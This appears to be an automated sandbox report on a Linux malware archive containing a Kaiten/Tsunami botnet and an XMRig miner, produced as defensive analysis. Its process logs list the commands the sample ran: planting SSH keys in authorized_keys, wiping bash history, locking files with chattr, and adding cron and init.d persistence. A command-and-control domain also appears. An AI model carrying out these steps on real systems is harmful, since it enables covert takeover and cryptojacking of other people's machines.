Malware Analysis Report

2024-11-13 17:22

Sample ID 241108-nqwp4s1jd1
Target myxmrig.tgz
SHA256 0de9266af49aab24256c289d39e86649d978d5a4c9d0ff2041a22140b88ea688
Tags
discovery upx persistence privilege_escalation kaiten botnet defense_evasion execution privilege_escalatio xmrig antivm miner
score
10/10

Analysis Overview

score
10/10

SHA256

0de9266af49aab24256c289d39e86649d978d5a4c9d0ff2041a22140b88ea688

Threat Level: Known bad

The file myxmrig.tgz was found to be: Known bad.

Malicious Activity Summary

Kaiten/Tsunami

Xmrig family

Kaiten family

Detects Kaiten/Tsunami payload

xmrig

Detects Kaiten/Tsunami Payload

XMRig Miner payload

Adds new SSH keys

Executes dropped EXE

File and Directory Permissions Modification

Writes file to system bin folder

Modifies init.d

Reads hardware information

Checks hardware identifiers (DMI)

Enumerates running processes

Attempts to change immutable files

Creates/modifies Cron job

UPX packed file

Security Software Discovery

Reads CPU attributes

Checks CPU configuration

Writes file to tmp directory

Process Discovery

System Network Configuration Discovery

Reads runtime system information

Enumerates kernel/hardware configuration

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 11:36

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-mipsbe-20240611-en

Max time kernel

0s

Command Line

[/tmp/.systemd/clean]

Signatures

N/A

Processes

/tmp/.systemd/clean

[/tmp/.systemd/clean]

/bin/uname

[uname -m]

/bin/rm

[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]

/bin/rm

[rm -rf /root/.bash_history]

Network

N/A

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-mipsel-20240611-en

Max time kernel

0s

Command Line

[/tmp/.update/.run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/update.dir /tmp/.update/.run N/A
File opened for modification /tmp/.update/.update /tmp/.update/.run N/A

Processes

/tmp/.update/.run

[/tmp/.update/.run]

/bin/uname

[uname -m]

/bin/cat

[cat update.dir]

/tmp/.update/.mips

[./.mips -f]

Network

N/A

Files

/tmp/.update/update.dir

MD5 f162d09e078b8201089b7e20ea72f2bf
SHA1 f7da8700cd21e201f62a17992d2ac15c09c447a1
SHA256 2162d6f6fadf44bb1db38ea55ec80a7006c269061de5141bf9f4743ec9cd95fb
SHA512 adb0481faeeb35926c8ba2bf2549e7b43dc40864ebfb8c40274d5021dfc3d87a8c2c2aa2996a28068c061ae13c404e85e870a23a67a709b4522134ce2be221cb

/tmp/.update/.update

MD5 a0669fc7ed6e6c80a991b070e1f7909a
SHA1 313f4f3deaf4237a8d0059593f1a68d7b7cc434f
SHA256 808530d3d871a0ae2d88b92e3820c8dbdd9b9a1ab469d4ed0088dce65b96545b
SHA512 2963bbba5c52178b3732139352144c8b34a81561ada3b803f50fdd51401017dc762fbdaed483e24da56b59d04381c8122b912c31d624a13d19ddfe951a55ec1f

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.systemd/.run]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/.systemd/-bash /tmp/.systemd/-bash N/A

Enumerates running processes

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

discovery
Description Indicator Process Target

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/-bash /bin/cp N/A

Processes

/tmp/.systemd/.run

[/tmp/.systemd/.run]

/bin/grep

[grep ssh ]

/bin/grep

[grep -v R]

/bin/grep

[grep -v grep]

/bin/ps

[ps x]

/usr/bin/awk

[awk {print $1}]

/usr/bin/awk

[awk {print $1}]

/bin/grep

[grep -v grep]

/bin/grep

[grep -v R]

/bin/grep

[grep ssh$]

/bin/ps

[ps x]

/usr/bin/awk

[awk {print $1}]

/bin/grep

[grep -v grep]

/bin/grep

[grep -v R]

/bin/grep

[grep sh$]

/bin/ps

[ps x]

/bin/uname

[uname -m]

/bin/cp

[cp -f -- .x86_64 -bash]

/tmp/.systemd/-bash

[./-bash]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.7:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp

Files

/tmp/.systemd/-bash

MD5 92dc30d449f563a5bdbba08d4a9d57fc
SHA1 ff609eed2df786396203a8806400566df079cc7f
SHA256 86db0330a233efe6e11f944833f9e9b7472d7f34595cf693f001d99df641513b
SHA512 573fa375ddcb6a49690f5168d791af2529a89233d3bf0ff50c2b88686c27e4cef59432e0f6ae71745fecfa2657c23248ad33ea50ac8b9f1c96721f38e3325097

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-armhf-20240611-en

Max time kernel

1s

Command Line

[/tmp/.systemd/go]

Signatures

N/A

Processes

/tmp/.systemd/go

[/tmp/.systemd/go]

/tmp/.systemd/auto

[./auto]

/tmp/.systemd/ntpdate

[./ntpdate]

/tmp/.systemd/.run

[./.run]

/tmp/.systemd/clean

[./clean]

Network

N/A

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.update/auth]

Signatures

Adds new SSH keys

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /root/.ssh/authorized_keys /tmp/.update/auth N/A
File opened for modification /home/user/.ssh/authorized_keys /tmp/.update/auth N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/filesystems /bin/mkdir N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/authusers /tmp/.update/auth N/A

Processes

/tmp/.update/auth

[/tmp/.update/auth]

/bin/uname

[uname -n]

/bin/mkdir

[mkdir /root/.ssh]

/bin/chmod

[chmod 0700 /root/.ssh]

/bin/chmod

[chmod 0644 /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ai /root/.ssh /root/.ssh/authorized_keys]

/bin/rm

[rm -rf authusers]

/bin/grep

[grep -e /bin/sh -e /bin/bash]

/bin/cat

[cat /etc/passwd]

/usr/bin/cut

[cut -d : -f 1]

/usr/bin/cut

[cut -d : -f 6]

/usr/bin/chattr

[chattr -ai /root/.ssh /root/.ssh/authorized_keys]

/bin/sed

[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]

/usr/bin/cut

[cut -d : -f 1]

/usr/bin/cut

[cut -d : -f 6]

/bin/mkdir

[mkdir /home/user/.ssh]

/bin/chown

[chown -R user /home/user/.ssh]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.14:443 tcp

Files

/root/.ssh/authorized_keys

MD5 8fe44e7f210016f1a630679fe2379c1b
SHA1 2ca1d7e85c3f3f57e93c224df0d6765615969b25
SHA256 7e086e2e17f07dcf4f39288e348e14ec7cff52af7aca8b537ed13e2fb3fb4189
SHA512 981450e6206dcf76811bec0bc3fa8e87b2fd2ac3234754738a3220d29dc1a61b9e82a00ace865d21c365cc598b9caccf58686deb69be5820a52bcfb9b65eaa9c

/tmp/.update/authusers

MD5 9514cd886e4faf1f23baadfd967abcbd
SHA1 00894ed21cee494a192e94a782ae265e45d828f1
SHA256 6b6a14023ccb73d8e3ae440f372d66866d50ecd2141acc8cd947e29fd088d432
SHA512 17fb1a18e12a6c04f960d4c54d00100ebd87c20976bd98bb8d8b242725519ce3968ad9312472dfafc4e67e46a9eddba4a993511ec557035f09d94b7548c50ce6

/tmp/.update/authusers

MD5 fe065880cc6e0333e8679d0e03ff2369
SHA1 aaceb9f893c93f47ddccca1e2e502c01ecbc5456
SHA256 f06caf37e0abb7fe702087801c3ef6507d69560d1992dc4f3a2e788e70a37a77
SHA512 ccbe5ac641458e053b073b3cc9ebb5be2c086a5ec76ff46f36f8373a64e3964b6a1953a4165a6cd1b0cda52a3aed0f6227d4bec8f0370169bd68ed09e2a02e92

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.update/.run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/update.dir /tmp/.update/.run N/A
File opened for modification /tmp/.update/.update /tmp/.update/.run N/A

Processes

/tmp/.update/.run

[/tmp/.update/.run]

/bin/uname

[uname -m]

/bin/cat

[cat update.dir]

/tmp/.update/.x86_64

[./.x86_64 -f]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.65.91:443 tcp
US 151.101.65.91:443 tcp
GB 89.187.167.9:443 tcp

Files

/tmp/.update/update.dir

MD5 f162d09e078b8201089b7e20ea72f2bf
SHA1 f7da8700cd21e201f62a17992d2ac15c09c447a1
SHA256 2162d6f6fadf44bb1db38ea55ec80a7006c269061de5141bf9f4743ec9cd95fb
SHA512 adb0481faeeb35926c8ba2bf2549e7b43dc40864ebfb8c40274d5021dfc3d87a8c2c2aa2996a28068c061ae13c404e85e870a23a67a709b4522134ce2be221cb

/tmp/.update/.update

MD5 b6bd725d6b274dd0e0b8f5535fce571b
SHA1 419ef40db06a3220262166fa98db357c0ac017fa
SHA256 d2baa726c79e389cb82c2298f854d853aeebc175369f00a4d21eb3dbd03e8bcf
SHA512 c934ad46180bd3e3e3590658ed1f2cc55f48279a099d2bbf852c21af6840f04d9c41f47a8ddf5685e484f76730c4254d85c5c4b4561d9e3d33d1ec089f5e7578

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

1s

Max time network

132s

Command Line

[/tmp/.systemd/.i686]

Signatures

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/exe /tmp/.systemd/.i686 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.ssh /tmp/.systemd/.i686 N/A

Processes

/tmp/.systemd/.i686

[/tmp/.systemd/.i686]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 pwn.pwndns.pw udp
CA 51.79.74.212:80 pwn.pwndns.pw tcp
US 8.8.8.8:53 731FD16D.DDED1D5.2CE4CC06.IP udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

1s

Max time network

132s

Command Line

[/tmp/.systemd/.x86_64]

Signatures

Detects Kaiten/Tsunami Payload

Description Indicator Process Target
N/A N/A N/A N/A

Detects Kaiten/Tsunami payload

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Kaiten/Tsunami

botnet kaiten

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/exe /tmp/.systemd/.x86_64 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.ssh /tmp/.systemd/.x86_64 N/A

Processes

/tmp/.systemd/.x86_64

[/tmp/.systemd/.x86_64]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 pwn.pwndns.pw udp
CA 51.79.74.212:80 pwn.pwndns.pw tcp

Files

memory/2817-1-0x000077ec2b386000-0x000077ec2b39a760-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-mipsel-20240611-en

Max time kernel

0s

Command Line

[/tmp/.systemd/clean]

Signatures

N/A

Processes

/tmp/.systemd/clean

[/tmp/.systemd/clean]

/bin/uname

[uname -m]

/bin/rm

[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]

/bin/rm

[rm -rf /root/.bash_history]

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.systemd/auto]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.V7hfn5 /usr/bin/crontab N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/systemd.d /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/.systemd /tmp/.systemd/auto N/A

Processes

/tmp/.systemd/auto

[/tmp/.systemd/auto]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/usr/bin/wc

[wc -l]

/bin/grep

[grep .systemd]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab systemd.d]

/bin/rm

[rm -rf systemd.d]

/bin/chmod

[chmod u+x .systemd]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.129.91:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.1.91:443 ocp-ingress.fastly.gnome.org tcp
GB 89.187.167.8:443 tcp
US 1.1.1.1:53 odrs.gnome.org udp
US 1.1.1.1:53 odrs.gnome.org udp
GB 89.187.167.39:443 odrs.gnome.org tcp

Files

/tmp/.systemd/systemd.dir

MD5 1f3a48ead214b69a4e5bbcc12a732ddb
SHA1 3391a93f27a805c58de438e5a50267af13b619ab
SHA256 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c
SHA512 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d

/var/spool/cron/crontabs/tmp.V7hfn5

MD5 c0cf181774a9fad926645284a3680db5
SHA1 af146029c4b74552e4bbcb3d6fac3efe25898394
SHA256 3d96819b05bc634c0a6c10307757c360512c9af8ff898ee2ae9014e20bffc5a5
SHA512 85b7dd7adcfc0b75596b43e5768e06f6e81914b007044286113bc5c26132bffcf2898c912cc492bdad977f1c4d86272fb4fc531fa1ccf5c70cc952721f1cc244

/tmp/.systemd/.systemd

MD5 31e12aacb4572270e99f912dfb4e1d2c
SHA1 942830707a5f7de945e4bf6192c2266bfd529018
SHA256 f54b32d1e82e3fa5af6e074fdeb416ac8b8581f2cf5ef357d94c9241815228fd
SHA512 be1d751a060eef9e6c5b4d5df4578b2b38631b813ce8d9f7d84563779a1168ce934dad06d39ff501adf47f219531b7a571accb9a857e716a42cb98057010a5d2

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsbe-20240729-en

Max time kernel

0s

Command Line

[/tmp/.systemd/go]

Signatures

N/A

Processes

/tmp/.systemd/go

[/tmp/.systemd/go]

/tmp/.systemd/auto

[./auto]

/tmp/.systemd/ntpdate

[./ntpdate]

/tmp/.systemd/.run

[./.run]

/tmp/.systemd/clean

[./clean]

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsbe-20240611-en

Max time kernel

3s

Command Line

[/tmp/.systemd/ntpdate]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/cron.d/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.daily/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.hourly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.monthly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.weekly/ntpdate /usr/bin/tee N/A

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/ntpdate /usr/bin/tee N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/entpdate /usr/bin/tee N/A
File opened for modification /sbin/lntpdate /usr/bin/tee N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/mkdir N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/cp N/A
N/A N/A /bin/cp N/A
N/A N/A /bin/cp N/A
N/A N/A /bin/cp N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/ntpdate N/A

Processes

/tmp/.systemd/ntpdate

[/tmp/.systemd/ntpdate]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/bin/mkdir

[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]

/usr/bin/chattr

[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]

/bin/rm

[rm -rf /sbin/bcrond]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/bcrond]

/usr/bin/tee

[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]

/bin/chmod

[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr -a -i /sbin/bsysd]

/bin/rm

[rm -rf /sbin/bsysd]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/entpdate /sbin/bsysde]

/bin/rm

[rm -rf /sbin/bsysde]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysde]

/usr/bin/tee

[tee -a /sbin/entpdate]

/bin/chmod

[chmod +x /sbin/entpdate]

/usr/bin/chattr

[chattr +i +a /sbin/entpdate /sbin/bsysde]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/lntpdate /sbin/bsysdl]

/bin/rm

[rm -rf /sbin/bsysdl]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysdl]

/usr/bin/tee

[tee -a /sbin/lntpdate]

/bin/chmod

[chmod +x /sbin/lntpdate]

/usr/bin/chattr

[chattr +i +a /sbin/lntpdate /sbin/bsysdl]

/usr/bin/which

[which update-rc.d]

/usr/bin/chattr

[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]

/bin/rm

[rm -rf /sbin/binitd]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/binitd]

/usr/bin/tee

[tee -a /etc/init.d/ntpdate]

/bin/chmod

[chmod +x /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/chattr

[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/which

[which chkconfig]

Network

N/A

Files

/tmp/.systemd/systemd.dir

MD5 1f3a48ead214b69a4e5bbcc12a732ddb
SHA1 3391a93f27a805c58de438e5a50267af13b619ab
SHA256 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c
SHA512 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d

/etc/cron.d/ntpdate

MD5 755700d11d59e0daeb4f6452aee1ad5d
SHA1 6b1194921376bef9c7559629712772a11e78eaa4
SHA256 1b311adac81faa8f9bf687306192ff84c2ee12a9337dd1051c55004ce39a2b00
SHA512 446f3d05218fa12190dadd2f405345b9a5581221064314e8bce54b155c08ad9bdba17d15f6959e5eb987baaffa309cfb19bf92a1a944d580f66419060a44b2b7

/sbin/entpdate

MD5 4aeb6335d69473274691f59dc2096cfe
SHA1 440755e42aa67c6ab3e636aeb1e8ec9463cd7ffc
SHA256 87095fcf498e832162baa13ecd28367155d8a1b5d02aee9ec1b60e149a871785
SHA512 23b0ef7f02e090cae5b7c20f8b06f4c450e6e8ddc49f3df9c49d223aa2df36339bb92df56e4609240d5e2066ee328db0abebd38de4b3eef304e83e72f4f1886c

/sbin/lntpdate

MD5 3748e897538baafbc7b260b4d2fbc98f
SHA1 41d179e3cfc4c1820ea2c0fed0d50009564db79b
SHA256 ebcbd097cd86e990591360d56f077f37de35fd6f4ce222c6d286f2f7e1024cc7
SHA512 23519c47db8c96ed72be6833778013df9199bb6d243e989fca2a75dd55d2a5aca37228fc19b0e2537cb5e10a27d69815edc5b640c8e878d7e767559904eaccea

/etc/init.d/ntpdate

MD5 bd99a962d94b5b4c32f8b7c8ca1f9ea9
SHA1 af33dc04d1f16e5ccceb2c0569b26e45bb65b32b
SHA256 64e489965b3914b15f92dadd851560e95287a40923b6cc93849e0758cdbf8b28
SHA512 fc2f81575bab833e76f070a45c3b9a1a32bb3c19084166c0beed3d03694d38295f6761af1599169f84a2c6f4b8c8bd8e1d8230796191de84dda52edd6899cdfa

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

149s

Max time network

143s

Command Line

[/tmp/.update/.x86_64]

Signatures

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/.update/.x86_64 N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.NdujH4 /usr/bin/crontab N/A

Enumerates running processes

Reads hardware information

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/.update/.x86_64 N/A

Security Software Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /tmp/.update/.x86_64 N/A
File opened for reading /proc/cpuinfo /usr/bin/grep N/A
File opened for reading /proc/cpuinfo /usr/bin/grep N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/system/cpu/types /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/system/cpu/possible /tmp/.update/.x86_64 N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/bus/dax/devices/target_node /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/dax/target_node /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency /tmp/.update/.x86_64 N/A
File opened for reading /sys/fs/cgroup/cpuset.cpus.effective /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/dax/devices /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/node/devices/node0/cpumap /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition /tmp/.update/.x86_64 N/A

Process Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/ps N/A
N/A N/A /usr/bin/ps N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/21/stat /usr/bin/ps N/A
File opened for reading /proc/83/status /usr/bin/ps N/A
File opened for reading /proc/377/stat /usr/bin/ps N/A
File opened for reading /proc/872/cmdline /usr/bin/ps N/A
File opened for reading /proc/101/status /usr/bin/ps N/A
File opened for reading /proc/99/status /usr/bin/ps N/A
File opened for reading /proc/641/status /usr/bin/ps N/A
File opened for reading /proc/1557/status /usr/bin/ps N/A
File opened for reading /proc/1093/status /usr/bin/ps N/A
